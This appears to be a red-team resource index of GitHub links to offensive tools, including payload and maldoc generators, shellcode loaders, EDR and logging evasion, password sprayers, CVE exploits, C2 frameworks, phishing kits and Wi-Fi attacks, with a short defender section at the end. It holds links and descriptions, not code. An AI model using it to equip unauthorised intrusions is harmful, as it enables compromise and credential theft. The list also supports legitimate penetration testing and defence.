https://github.com/Screetsec/TheFatRat
https://github.com/xillwillx/tricky.lnk
https://github.com/trustedsec/unicorn
https://github.com/z0noxz/powerstager
https://github.com/curi0usJack/luckystrike
https://github.com/enigma0x3/Generate-Macro
https://github.com/Cn33liz/JSMeter
https://github.com/Mr-Un1k0d3r/MaliciousMacroGenerator
https://github.com/Cn33liz/StarFighters
https://github.com/BorjaMerino/Pazuzu
https://github.com/mwrlabs/wePWNise
https://github.com/Mr-Un1k0d3r/UniByAv
https://github.com/govolution/avet
https://github.com/Pepitoh/VBad
https://github.com/mdsecactivebreach/CACTUSTORCH
https://github.com/D4Vinci/Dr0p1t-Framework
https://github.com/g0tmi1k/msfpc
https://github.com/bhdresh/CVE-2017-0199 - Office RCE POC
https://github.com/jacob-baines/concealed_position - Bring your own print driver privilege escalation tool
https://github.com/GreatSCT/GreatSCT
https://github.com/mthbernardes/rsg - reverse shell generator
https://github.com/sevagas/macro_pack
https://github.com/mdsecactivebreach/SharpShooter
https://github.com/hlldz/SpookFlare
https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads
https://github.com/peewpw/Invoke-PSImage
https://github.com/Arvanaghi/CheckPlease - Sandbox Evasion techniques
https://github.com/Aetsu/SLib - SandBox Evasion in C#
https://github.com/trustedsec/nps_payload
https://github.com/stormshadow07/HackTheWorld
https://github.com/r00t-3xp10it/FakeImageExploiter
https://github.com/nccgroup/demiguise - Encrypted HTA Generation
https://github.com/med0x2e/genxlm
https://github.com/med0x2e/GadgetToJScript
https://github.com/rasta-mouse/GadgetToJScript - Optimized GadgetToJScript version
https://github.com/EgeBalci/sgn - Shikata ga nai (仕方がない) encoder ported into go with several improvements
https://github.com/matterpreter/spotter - Spotter is a tool to wrap payloads in environmentally-keyed, AES256-encrypted launchers.
https://github.com/s0lst1c3/dropengine - Malleable payload generation framework.
https://github.com/gigajew/PowerDropper - Build Powershell Script from .NET Executable
https://github.com/FortyNorthSecurity/EXCELntDonut - Excel 4.0 (XLM) Macro Generator for injecting DLLs and EXEs into memory.
https://github.com/Greenwolf/ntlm_theft - A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)
https://github.com/phackt/stager.dll - AES Encrypt payloads
https://github.com/Arno0x/EmbedInHTML - Embed and hide any file in an HTML file
https://github.com/bats3c/darkarmour - AES Encrypt C/C++ Compiled binaries and decrypt at runtime
https://github.com/christophetd/spoofing-office-macro - PoC of a VBA macro spawning a process with a spoofed parent and command line.
https://github.com/infosecn1nja/MaliciousMacroMSBuild - Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.
https://github.com/outflanknl/EvilClippy - A cross-platform assistant for creating malicious MS Office documents. Can hide VBA macros, stomp VBA code (via P-Code) and confuse macro analysis tools. Runs on Linux, OSX and Windows.
https://github.com/FortyNorthSecurity/EXCELntDonut - Excel 4.0 (XLM) Macro Generator for injecting DLLs and EXEs into memory.
https://github.com/STMCyber/boobsnail - BoobSnail allows generating Excel 4.0 XLM macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation.
https://github.com/michaelweber/Macrome - Excel Macro Document Reader/Writer for Red Teamers & Analysts
https://github.com/aaaddress1/xlsKami - Out-of-the-Box Tool to Obfuscate Excel XLS. Include Obfuscation & Hide for Cell Labels & BoundSheets
https://github.com/CCob/PwnyForm - PwnyForm will take an MSI installer as input and generate an MSI transform (mst) that can be used to inject arbitrary command execution by adding a custom action that will execute during the UI or Install sequence of an MSI file.
https://github.com/fireeye/OfficePurge - VBA purge your Office documents with OfficePurge. VBA purging removes P-code from module streams within Office documents. Documents that only contain source code and no compiled code are more likely to evade AV detection and YARA rules.
https://github.com/TestingPens/CPLDropper - A Control Panel Applet dropper project. It has a high success rate on engagements since nobody cares about .CPL files and you can just double click them.
https://github.com/FortyNorthSecurity/hot-manchego - Macro-Enabled Excel File Generator (.xlsm) using the EPPlus Library.
https://github.com/knight0x07/ImpulsiveDLLHijack - C# based tool which automates the process of discovering and exploiting DLL Hijacks in target binaries. The Hijacked paths discovered can later be weaponized during Red Team Operations to evade EDR's.
https://github.com/Flangvik/SharpDllProxy - Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading
https://github.com/jfmaes/Invoke-DLLClone - Koppeling x Metatwin x LazySign
https://github.com/paranoidninja/CarbonCopy - Sign an executable for AV-Evasion
https://github.com/Tylous/Limelighter - A tool for generating fake code signing certificates or signing real ones
https://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50 - RCE 0-day for GhostScript 9.50 - Payload generator - ImageMagick
https://github.com/X-C3LL/xlsxPoison - Just a PoC to turn xlsx (regular Excel files) into xlsm (Excel file with macro) and slipping inside a macro (vbaProject.bin)
https://github.com/med0x2e/SigFlip - SigFlip is a tool for patching authenticode signed PE files (exe, dll, sys ..etc) without invalidating or breaking the existing signature.
https://github.com/klezVirus/inceptor - Template-Driven AV/EDR Evasion Framework
https://github.com/Inf0secRabbit/BadAssMacros - BadAssMacros - C# based automated Malicous Macro Generator.
https://github.com/connormcgarr/LittleCorporal - LittleCorporal: A C# Automated Maldoc Generator
https://github.com/hasherezade/process_ghosting - Process Ghosting - a PE injection technique, similar to Process Doppelgänging, but using a delete-pending file instead of a transacted file
https://github.com/optiv/ScareCrow - ScareCrow - Payload creation framework designed around EDR bypass.
https://github.com/persianhydra/Xeexe-TopAntivirusEvasion - Undetectable & Xor encrypting with custom KEY (FUD Metasploit Rat) bypass Top Antivirus like BitDefender,Malwarebytes,Avast,ESET-NOD32,AVG,... & Automatically Add ICON and MANIFEST to excitable
# Shellcode Injection
https://github.com/TheWover/donut - Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters
https://github.com/rasta-mouse/RuralBishop - D/Invoke port of UrbanBishop
https://github.com/slyd0g/UrbanBishopLocal - A port of FuzzySecurity's UrbanBishop project for inline shellcode execution
https://github.com/FuzzySecurity/Sharp-Suite/tree/master/UrbanBishop - Donut for Shellcode Injection
https://github.com/antonioCoco/Mapping-Injection - Mapping injection is a process injection technique that avoids the usage of common monitored syscall VirtualAllocEx, WriteProcessMemory and CreateRemoteThread.
https://github.com/SolomonSklash/SyscallPOC - Shellcode injection POC using syscalls.
https://github.com/Arno0x/ShellcodeWrapper - Shellcode wrapper with encryption for multiple target languages
https://github.com/Ne0nd0g/go-shellcode - A repository of Windows Shellcode runners and supporting utilities. The applications load and execute Shellcode using various API calls or techniques.
https://github.com/djhohnstein/CSharpSetThreadContext - C# Shellcode Runner to execute shellcode via CreateRemoteThread and SetThreadContext to evade Get-InjectedThread
https://github.com/pwndizzle/c-sharp-memory-injection - A set of scripts that demonstrate how to perform memory injection in C#
https://github.com/jthuraisamy/SysWhispers2 - SysWhispers helps with evasion by generating header/ASM files implants can use to make direct system calls.
https://github.com/mai1zhi2/SysWhispers2_x86 - X86 version of syswhispers2 / x86 direct system call
https://github.com/knownsec/shellcodeloader - CreateThreadpoolWait, Fiber Load, NtTestAlert Load, SEH Except Load, TLS CallBack Load, Dynamic Load, Dynamic Load plus, Syscall Load, APC-Inject Load, Early Brid APC-Inject Load, NtCreateSection-Inject Load, OEP Hiijack-Inject Load, Thread Hiijack-Inject Load
https://github.com/djhohnstein/ScatterBrain - Suite of Shellcode Running Utilities
https://github.com/D00MFist/Go4aRun - Shellcode runner in GO that incorporates shellcode encryption, remote process injection, block dlls, and spoofed parent process
https://github.com/sh4hin/GoPurple - Yet another shellcode runner consists of different techniques for evaluating detection capabilities of endpoint security solutions
https://github.com/C-Sto/BananaPhone - It's a go variant of Hells gate! (directly calling windows kernel functions, but from Go!)
https://github.com/3xpl01tc0d3r/ProcessInjection - This program is designed to demonstrate various process injection techniques
https://github.com/plackyhacker/Shellcode-Injection-Techniques - A collection of C# shellcode injection techniques. All techniques use an AES encrypted meterpreter payload. I will be building this project up as I learn, discover or develop more techniques. Some techniques are better than others at bypassing AV.
https://github.com/snovvcrash/DInjector - Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL
https://github.com/plackyhacker/Suspended-Thread-Injection - Another meterpreter injection technique using C# that attempts to bypass Defender
https://github.com/boku7/Ninja_UUID_Dropper - Module Stomping, No New Thread, HellsGate syscaller, UUID Dropper for x64 Windows 10!
https://github.com/mobdk/Upsilon - Upsilon execute shellcode with syscalls - no API like NtProtectVirtualMemory is used
https://github.com/0xDivyanshu/Injector - Complete Arsenal of Memory injection and other techniques for red-teaming in Windows
https://github.com/JohnWoodman/stealthInjector - Injects shellcode into remote processes using direct syscalls
https://github.com/xpn/NautilusProject - A collection of weird ways to execute unmanaged code in .NET
https://github.com/xinbailu/DripLoader - Evasive shellcode loader for bypassing event-based injection detection (PoC)
https://github.com/cribdragg3r/Alaris - A protective and Low Level Shellcode Loader that defeats modern EDR systems.
https://github.com/theevilbit/injection - C++ Injection techniques
https://github.com/RomanRII/shellcode-through-ICMP - https://blog.romanrii.com/using-icmp-to-deliver-shellcode
https://github.com/ChaitanyaHaritash/Callback_Shellcode_Injection - POCs for Shellcode Injection via Callbacks
https://github.com/ChoiSG/UuidShellcodeExec - PoC for UUID shellcode execution using DInvoke
https://github.com/S4R1N/AlternativeShellcodeExec - Alternative Shellcode Execution Via Callbacks
https://github.com/DamonMohammadbagher/NativePayload_CBT - NativePayload_CallBackTechniques C# Codes (Code Execution via Callback Functions Technique, without CreateThread Native API)
https://github.com/S3cur3Th1sSh1t/Nim_CBT_Shellcode - CallBack-Techniques for Shellcode execution ported to Nim
# Loader / Packer / Injectors
https://github.com/med0x2e/ExecuteAssembly - Load/Inject .NET assemblies by; reusing the host (spawnto) process loaded CLR AppDomainManager, Stomping Loader/.NET assembly PE DOS headers, Unlinking .NET related modules, bypassing ETW+AMSI, avoiding EDR hooks via NT static syscalls (x64) and hiding imports by dynamically resolving APIs (hash)
https://github.com/EgeBalci/amber - Reflective PE packer.
https://github.com/djhohnstein/ScatterBrain - Suite of Shellcode Running Utilities
https://github.com/phra/PEzor - Open-Source PE Packer
https://github.com/dretax/DynamicDllLoader - This project describes a technique how a NATIVE dynamic link library (DLL) can be loaded from memory (In C#) without storing it on the hard-disk first.
https://github.com/nettitude/RunPE - C# Reflective loader for unmanaged binaries.
# EDR Evasion - Logging Evasion
https://github.com/CCob/SharpBlock - A method of bypassing EDR's active projection DLL's by preventing entry point execution
https://github.com/bats3c/Ghost-In-The-Logs - Evade sysmon and windows event logging
https://github.com/am0nsec/SharpHellsGate - C# Implementation of the Hell's Gate VX Technique
https://github.com/am0nsec/HellsGate - Original C Implementation of the Hell's Gate VX Technique
https://github.com/3gstudent/Windows-EventLog-Bypass - C++ Version of Invoke-Phantom
https://github.com/jfmaes/SharpNukeEventLog - C# version of Invoke-Phantom
https://github.com/Soledge/BlockEtw - .Net Assembly to block ETW telemetry in current process
https://github.com/ionescu007/faxhell - A Bind Shell Using the Fax Service and a DLL Hijack
https://github.com/realoriginal/ppdump-public - Protected Process (Light) Dump: Uses Zemana AntiMalware Engine To Open a Privileged Handle to a PP/PPL Process And Inject MiniDumpWriteDump() Shellcode
https://github.com/bats3c/EvtMute - This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging.
https://github.com/GetRektBoy724/TripleS - Extracting Syscall Stub, Modernized
https://github.com/call-042PE/UCantSeeM3 - Hiding your process in ProcessHacker,Task Manager,etc by patching NtQuerySystemInformation
https://github.com/bats3c/DarkLoadLibrary - LoadLibrary for offensive operations
https://github.com/moloch--/DarkLoadLibrary - Same but with LLVM support
https://github.com/scythe-io/memory-module-loader - An implementation of a Windows loader that can load dynamic-linked libraries (DLLs) directly from memory
https://github.com/Yaxser/Backstab - A tool to kill antimalware protected processes
https://github.com/RedCursorSecurityConsulting/PPLKiller - Tool to bypass LSA Protection (aka Protected Process Light)
https://github.com/passthehashbrowns/suspendedunhook - get NTDLL copy from suspended process
https://github.com/LloydLabs/delete-self-poc - A way to delete a locked file, or current running executable, on disk.
https://github.com/klezVirus/SharpSelfDelete - C# implementation of the research by @jonaslyk and the drafted PoC from @LloydLabs
https://github.com/jxy-s/herpaderping - Process Herpaderping proof of concept, tool, and technical deep dive. Process Herpaderping bypasses security products by obscuring the intentions of a process.
https://github.com/bohops/UltimateWDACBypassList - A centralized resource for previously documented WDAC bypass techniques
https://github.com/mgeeky/ShellcodeFluctuation - An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents
https://github.com/mgeeky/ThreadStackSpoofer - Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.
https://github.com/SolomonSklash/SleepyCrypt - A shellcode function to encrypt a running process image when sleeping.
https://github.com/aaaddress1/PR0CESS - some gadgets about windows process and ready to use :)
https://github.com/JLospinoso/gargoyle - A memory scanning evasion technique
https://github.com/passthehashbrowns/hiding-your-syscalls - Some source code to demonstrate avoiding certain direct syscall detections by locating and JMPing to a legitimate syscall instruction within NTDLL.
https://github.com/hasherezade/module_overloading - A more stealthy variant of "DLL hollowing"
https://github.com/forrest-orr/phantom-dll-hollower-poc - Phantom DLL hollowing PoC
https://github.com/hasherezade/transacted_hollowing - Transacted Hollowing - a PE injection technique, hybrid between ProcessHollowing and ProcessDoppelgänging
https://github.com/GetRektBoy724/SharpUnhooker - C# Based Universal API Unhooker
https://github.com/mgeeky/UnhookMe - UnhookMe is an universal Windows API resolver & unhooker addressing problem of invoking unmonitored system calls from within of your Red Teams malware
https://github.com/aaaddress1/wowInjector - PoC: Exploit 32-bit Thread Snapshot of WOW64 to Take Over $RIP & Inject & Bypass Antivirus HIPS (HITB 2021)
https://github.com/RedSection/OffensivePH - OffensivePH - use old Process Hacker driver to bypass several user-mode access controls
https://github.com/optiv/Dent - A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.
https://github.com/Dewera/Pluto - A manual system call library that supports functions from both ntdll.dll and win32u.dll
https://github.com/jackullrich/universal-syscall-64 - Resolve syscall numbers at runtime for all Windows versions.
https://github.com/br-sn/CheekyBlinder - Enumerating and removing kernel callbacks using signed vulnerable drivers
https://github.com/jthuraisamy/TelemetrySourcerer - Enumerate and disable common sources of telemetry used by AV/EDR.
https://github.com/TheWover/DInvoke - Dynamically invoke arbitrary unmanaged code from managed code without PInvoke.
https://github.com/fashionproof/CheckSafeBoot - I used this to see if an EDR is running in Safe Mode
https://github.com/asaurusrex/DoppelGate - DoppelGate relies on reading ntdll on disk to grab syscall stubs, and patches these syscall stubs into desired functions to bypass Userland Hooking.
# Useful Binary Modification tools
https://github.com/hasherezade/exe_to_dll
https://github.com/hasherezade/dll_to_exe
https://github.com/hasherezade/pe_to_shellcode
## Android
https://github.com/sensepost/kwetza
# External Penetration Testing
## Domain Finding / Subdomain Enumeration
https://github.com/aboul3la/Sublist3r
https://github.com/TheRook/subbrute
https://github.com/michenriksen/aquatone
https://github.com/darkoperator/dnsrecon
https://github.com/fwaeytens/dnsenum
https://github.com/s0md3v/Striker + Scanner
https://github.com/leebaird/discover
https://github.com/eldraco/domain_analyzer - more like an audit
https://github.com/caffix/amass - :heartpulse:
https://github.com/subfinder/subfinder
https://github.com/TypeError/domained
https://github.com/SilverPoision/Rock-ON
## File Search / Metadata extraction
https://github.com/dafthack/PowerMeta
https://github.com/ElevenPaths/FOCA
## Scanner
https://github.com/vesche/scanless
https://github.com/1N3/Sn1per
https://github.com/DanMcInerney/pentest-machine
https://github.com/jaeles-project/jaeles - The Swiss Army knife for automated Web Application Testing
## Email Gathering
https://github.com/leapsecurity/InSpy
https://github.com/dchrastil/ScrapedIn
https://github.com/SimplySecurity/SimplyEmail
https://github.com/clr2of8/GatherContacts
https://github.com/s0md3v/Zen - Find Emails of Github Users
https://github.com/m8r0wn/CrossLinked - super fast emails via google/bing linkedin dorks
https://github.com/m4ll0k/Infoga
https://github.com/navisecdelta/EmailGen - A simple email generator that uses dorks on Bing to generate emails from LinkedIn Profiles.
## Check Email Accounts
https://github.com/megadose/holehe - allows you to check if the mail is used on different sites like twitter, instagram and will retrieve information on sites with the forgotten password function.
## Domain Auth + Exploitation
https://github.com/nyxgeek/o365recon
https://github.com/gremwell/o365enum - Enumerate valid usernames from Office 365 using ActiveSync, Autodiscover v1, or office.com login page.
https://github.com/dafthack/MSOLSpray - A password spraying tool for Microsoft Online accounts (Azure/O365). The script logs if a user cred is valid, if MFA is enabled on the account, if a tenant doesn't exist, if a user doesn't exist, if the account is locked, or if the account is disabled.
https://github.com/sachinkamath/NTLMRecon - Tool to enumerate information from NTLM authentication enabled web endpoints
https://github.com/ustayready/fireprox - rotate IP Adresses over AWS - Combine with MSOLSpray
https://github.com/True-Demon/raindance - office 365 recon
https://github.com/dafthack/MailSniper
https://github.com/sensepost/ruler
https://github.com/Greenwolf/Spray - lockout Time integrated
https://github.com/nyxgeek/lyncsmash - Lync Credential Finder
https://github.com/byt3bl33d3r/SprayingToolkit - Scripts to make password spraying attacks against Lync/S4B & OWA a lot quicker, less painful and more efficient
https://github.com/mdsecresearch/LyncSniper - Lync Credential Finder
https://github.com/3gstudent/easBrowseSharefile - Use to browse the share file by eas(Exchange Server ActiveSync)
https://github.com/FSecureLABS/peas - PEAS is a Python 2 library and command line application for running commands on an ActiveSync server e.g. Microsoft Exchange.
https://github.com/snovvcrash/peas - Modified version of PEAS client for offensive operations - https://snovvcrash.rocks/2020/08/22/tuning-peas-for-fun-and-profit.html
https://github.com/RedLectroid/OutlookSend - A C# tool to send emails through Outlook from the command line or in memory
https://github.com/nccgroup/Carnivore - Tool for assessing on-premises Microsoft servers authentication such as ADFS, Skype, Exchange, and RDWeb
https://github.com/ricardojoserf/adfsbrute - A script to test credentials against Active Directory Federation Services (ADFS), allowing password spraying or bruteforce attacks.
https://github.com/nyxgeek/onedrive_user_enum - onedrive user enumeration - pentest tool to enumerate valid onedrive users
https://github.com/nyxgeek/AzureAD_Autologon_Brute - Brute force attack tool for Azure AD Autologon/Seamless SSO - Source: https://arstechnica.com/information-technology/2021/09/new-azure-active-directory-password-brute-forcing-flaw-has-no-fix/
https://github.com/treebuilder/aad-sso-enum-brute-spray - POC of SecureWorks' recent Azure Active Directory password brute-forcing vuln
https://github.com/SecurityRiskAdvisors/msspray - Password attacks and MFA validation against various endpoints in Azure and Office 365
https://github.com/immunIT/TeamsUserEnum - User enumeration with Microsoft Teams API
https://github.com/knavesec/CredMaster - Refactored & improved CredKing password spraying tool, uses FireProx APIs to rotate IP addresses, stay anonymous, and beat throttling
## Exchange RCE-exploits
https://github.com/Airboi/CVE-2020-17144-EXP - Exchange2010 authorized RCE
https://github.com/Ridter/cve-2020-0688 - OWA Deserialisation RCE
## MobileIron RCE
https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2020-15505
# Specific Service Scanning / Exploitation
## Login Brute Force + Wordlist attacks
https://github.com/galkan/crowbar - Brute force non hydra compliant services - RDP, VNC, OpenVPN
https://github.com/1N3/BruteX - Brute Force various services
https://github.com/x90skysn3k/brutespray - :sunglasses:
https://github.com/DarkCoderSc/win-brute-logon - Crack any Microsoft Windows users password without any privilege (Guest account included)
https://github.com/lanjelot/patator
https://github.com/dafthack/RDPSpray - RDP Password Spray - No Event Logs
https://github.com/xFreed0m/RDPassSpray - Python3 tool to perform password spraying using RDP
## SNMP
https://github.com/hatlord/snmpwn
## Open X11
https://github.com/sensepost/xrdp
## Printers
https://github.com/RUB-NDS/PRET
https://github.com/BusesCanFly/PRETty - Automation for PRET
## MSSQL
https://github.com/quentinhardy/msdat
## Oracle
https://github.com/quentinhardy/odat
## IKE
https://github.com/SpiderLabs/ikeforce
## SMB Null Session Exploitation
https://github.com/m8r0wn/nullinux
## iLO Exploitation
https://github.com/airbus-seclab/ilo4_toolbox
https://www.exploit-db.com/exploits/44005
## vmware vCenter Exploits
https://github.com/guardicore/vmware_vcenter_cve_2020_3952 - Exploit for CVE-2020-3952 in vCenter 6.7
## Intel AMT Exploitation
https://github.com/Coalfire-Research/DeathMetal
## SAP Exploitation
https://github.com/comaeio/OPCDE
https://github.com/gelim/sap_ms
https://github.com/chipik/SAP_GW_RCE_exploit
## FPM port
Found Port 9001 open? Try that:
https://github.com/hannob/fpmvuln - bash poc scripts to exploit open fpm ports
## Weblogic Exploitation
https://github.com/0xn0ne/weblogicScanner - scan/test for nearly all weblogic vulns
https://github.com/quentinhardy/jndiat - WEblogic Server Tests
https://github.com/kingkaki/weblogic-scan
https://github.com/FlyfishSec/weblogic_rce - cve-2019-2725
https://github.com/SukaraLin/CVE-2019-2890
https://github.com/1337g/CVE-2017-10271
https://github.com/LandGrey/CVE-2018-2894
https://github.com/Y4er/CVE-2020-2551
## Sharepoint exploitation
https://github.com/sensepost/SPartan - Sharepoint Fingerprint + Exploitation
https://github.com/Voulnet/desharialize
## JIRA
https://github.com/0x48piraj/Jiraffe - One stop place for exploiting Jira instances in your proximity
## Sonicwall VPN
https://github.com/darrenmartyn/VisualDoor
## VSphere VCenter
https://github.com/JamesCooteUK/SharpSphere - .NET Project for Attacking vCenter
## Dameware
https://github.com/warferik/CVE-2019-3980
## Confluence Exploit
https://github.com/h3v0x/CVE-2021-26084_Confluence - Confluence Server Webwork OGNL injection
## Telerik UI for ASP.NET AJAX Exploit
https://github.com/noperator/CVE-2019-18935
## General Recon
https://github.com/FortyNorthSecurity/EyeWitness
## Solarwinds
https://github.com/mubix/solarflare - SolarWinds Orion Account Audit / Password Dumping Utility
# Command & Control Frameworks
https://github.com/n1nj4sec/pupy
https://github.com/nettitude/PoshC2
https://github.com/FortyNorthSecurity/WMImplant
https://github.com/quasar/QuasarRAT
https://github.com/EmpireProject/Empire
https://github.com/zerosum0x0/koadic
https://github.com/Mr-Un1k0d3r/ThunderShell
https://github.com/Ne0nd0g/merlin
https://github.com/Arno0x/WebDavC2
https://github.com/malwaredllc/byob
https://github.com/byt3bl33d3r/SILENTTRINITY
https://github.com/SharpC2/SharpC2 - Command and Control Framework written in C#.
https://github.com/Arno0x/WSC2
https://github.com/BC-SECURITY/Empire - Empire with embedded AMSI-Bypass
https://github.com/cobbr/Covenant
https://github.com/cobbr/C2Bridge - C2Bridges allow developers to create new custom communication protocols and quickly utilize them within Covenant.
https://github.com/py7hagoras/CovenantTasks - Source for tasks I have used with Covenant
https://github.com/BishopFox/sliver - Implant framework
https://github.com/bats3c/shad0w - A post exploitation framework designed to operate covertly on heavily monitored environments
https://github.com/FSecureLABS/C3 - Custom Command and Control (C3). A framework for rapid prototyping of custom C2 channels, while still providing integration with existing offensive toolkits.
https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp - Open-Source Remote Administration Tool For Windows C# (RAT)
https://github.com/its-a-feature/Mythic
https://github.com/Cr4sh/MicroBackdoor - Small and convenient C2 tool for Windows targets
https://github.com/cyberark/kubesploit - Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang, focused on containerized environments.
## Mythic Agents
https://github.com/MythicAgents/Apollo
https://github.com/MythicAgents/Nimplant
# VBA
https://github.com/JohnWoodman/VBA-Macro-Projects - This repository is a collection of my malicious VBA projects.
https://github.com/karttoon/trigen - Trigen is a Python script which uses different combinations of Win32 function calls in generated VBA to execute shellcode.
https://github.com/rmdavy/HeapsOfFun - AMSI Bypass Via the Heap
https://github.com/S3cur3Th1sSh1t/OffensiveVBA - This repo covers some code execution and AV Evasion methods for Macros in Office documents
# Rust
https://github.com/Kudaes/DInvoke_rs - Dynamically invoke arbitrary unmanaged code.
https://github.com/trickster0/OffensiveRust - Rust Weaponization for Red Team Engagements.
# Go
https://github.com/malware-unicorn/GoPEInjection - Golang PE injection on windows
# Cobalt Strike Stuff
https://github.com/DeEpinGh0st/Erebus
https://github.com/aleenzz/Cobalt_Strike_wiki
https://github.com/FortyNorthSecurity/C2concealer
https://github.com/invokethreatguy/AggressorCollection
https://github.com/harleyQu1nn/AggressorScripts
https://github.com/mgeeky/cobalt-arsenal - My collection of battle-tested Aggressor Scripts for Cobalt Strike 4.0+
https://github.com/xforcered/CredBandit - Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel
https://github.com/EncodeGroup/BOF-RegSave - Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File
https://github.com/EncodeGroup/AggressiveGadgetToJScript - A Cobalt Strike Aggressor script to generate GadgetToJScript payloads
https://github.com/rvrsh3ll/BOF_Collection - Various Cobalt Strike BOFs
https://github.com/EspressoCake/HandleKatz_BOF - A BOF port of the research of @thefLinkk and @codewhitesec
https://github.com/trustedsec/CS-Situational-Awareness-BOF - Situational Awareness commands implemented using Beacon Object Files
https://github.com/anthemtotheego/InlineExecute-Assembly - InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module
https://github.com/EspressoCake/Self_Deletion_BOF - BOF implementation of the research by @jonaslyk and the drafted PoC from @LloydLabs
https://github.com/EspressoCake/PPLDump_BOF - A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.
https://github.com/boku7/CobaltStrikeReflectiveLoader - Cobalt Strike User-Defined Reflective Loader written in Assembly & C for advanced evasion capabilities.
https://github.com/optiv/Registry-Recon - Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon
https://github.com/Tylous/SourcePoint - SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.
https://github.com/boku7/spawn - Cobalt Strike BOF that spawns a sacrificial process, injects it with shellcode, and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG), BlockDll, and PPID spoofing.
https://github.com/OG-Sadpanda/SharpExcelibur - Read Excel Spreadsheets (XLS/XLSX) using Cobalt Strike's Execute-Assembly
https://github.com/OG-Sadpanda/SharpSword - Read the contents of DOCX files using Cobalt Strike's Execute-Assembly
https://github.com/EncodeGroup/AggressiveProxy - Project to enumerate proxy configurations and generate shellcode from CobaltStrike
https://github.com/mgeeky/RedWarden - Cobalt Strike C2 Reverse proxy that fends off Blue Teams, AVs, EDRs, scanners through packet inspection and malleable profile correlation
https://github.com/rsmudge/unhook-bof - Remove API hooks from a Beacon process.
https://github.com/ajpc500/BOFs - Collection of Beacon Object Files
https://github.com/outflanknl/InlineWhispers - Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)
# Android
https://github.com/AhMyth/AhMyth-Android-RAT
# Linux MacOSX Specific
https://github.com/neoneggplant/EggShell
# Wifi Tools
https://github.com/wifiphisher/wifiphisher
https://github.com/P0cL4bs/WiFi-Pumpkin
https://github.com/s0lst1c3/eaphammer
https://github.com/h0nus/RogueSploit
https://github.com/Tylous/SniffAir
https://github.com/FluxionNetwork/fluxion
https://github.com/derv82/wifite2
https://github.com/ICSec/airpwn-ng
https://github.com/xdavidhu/mitmAP
https://github.com/ZerBea/hcxdumptool
https://github.com/P0cL4bs/wifipumpkin3 - Powerful framework for rogue access point attack.
# Android / Nethunter
https://github.com/faizann24/wifi-bruteforcer-fsecurify
https://github.com/chrisk44/Hijacker
# NAT Slipstreaming
https://github.com/samyk/slipstream - NAT Slipstreaming allows an attacker to remotely access any TCP/UDP services bound to a victim machine, bypassing the victim’s NAT/firewall, just by the victim visiting a website
# Raspberri PI Exploitation
https://github.com/secgroundzero/warberry
https://github.com/samyk/poisontap
https://github.com/mame82/P4wnP1
https://github.com/mame82/P4wnP1_aloa
https://github.com/pi-hole/pi-hole
# Physical Security / HID/ETH Emulator
https://github.com/carmaa/inception - PCI-based DMA
https://github.com/samratashok/Kautilya
https://github.com/ufrisk/pcileech - PCI based DMA
https://github.com/Screetsec/Brutal - Teensy Payloads
https://github.com/insecurityofthings/jackit
https://github.com/BastilleResearch/mousejack
# Social Engeneering
https://github.com/kgretzky/evilginx
https://github.com/threatexpress/domainhunter
https://github.com/netevert/dnsmorph - lookup valid phishing-Domains
https://github.com/elceef/dnstwist - lookup valid phishing-Domains
https://github.com/quickbreach/SMBetray - Change SMB Files on the fly
https://github.com/SteveLTN/https-portal
https://github.com/ryhanson/phishery
https://github.com/curtbraz/Phishing-API - Comprehensive Web Based Phishing Suite of Tools for Rapid Deployment and Real-Time Alerting!
# Defender Guides / Tools / Incident Response / Blue Team
https://github.com/CCob/BeaconEye - Hunts out CobaltStrike beacons and logs operator command output
https://github.com/3lp4tr0n/BeaconHunter - Detect and respond to Cobalt Strike beacons using ETW.
https://github.com/IonizeCbr/AmsiPatchDetection - Detect AMSI.dll in memory patch
https://github.com/cisagov/Sparrow - Sparrow.ps1 was created by CISA's Cloud Forensics team to help detect possible compromised accounts and applications in the Azure/m365 environment.
https://github.com/meirwah/awesome-incident-response
https://github.com/CredDefense/CredDefense - Credential and Red Teaming Defense for Windows Environments
https://github.com/PaulSec/awesome-windows-domain-hardening
https://github.com/ernw/hardening
https://github.com/Invoke-IR/Uproot
https://github.com/danielbohannon/Revoke-Obfuscation - powershell obfuscation detection
https://github.com/NotPrab/.NET-Deobfuscator - Lists of .NET Deobfuscator and Unpacker (Open Source)
https://github.com/countercept/python-exe-unpacker - python exe decompile
https://github.com/0xd4d/de4dot - .NET Revoke-Obfuscation
https://github.com/securitywithoutborders/hardentools
https://github.com/x0rz/phishing_catcher
https://github.com/Ben0xA/PowerShellDefense
https://github.com/emposha/PHP-Shell-Detector
https://github.com/LordNoteworthy/al-khaser
https://github.com/Security-Onion-Solutions/security-onion - ids
https://github.com/ptresearch/AttackDetection
https://github.com/MHaggis/hunt-detect-prevent
https://github.com/JPCERTCC/LogonTracer - Investigate malicious Windows logon by visualizing and analyzing Windows event log
https://github.com/lithnet/ad-password-protection - AD Passwort Blacklisting
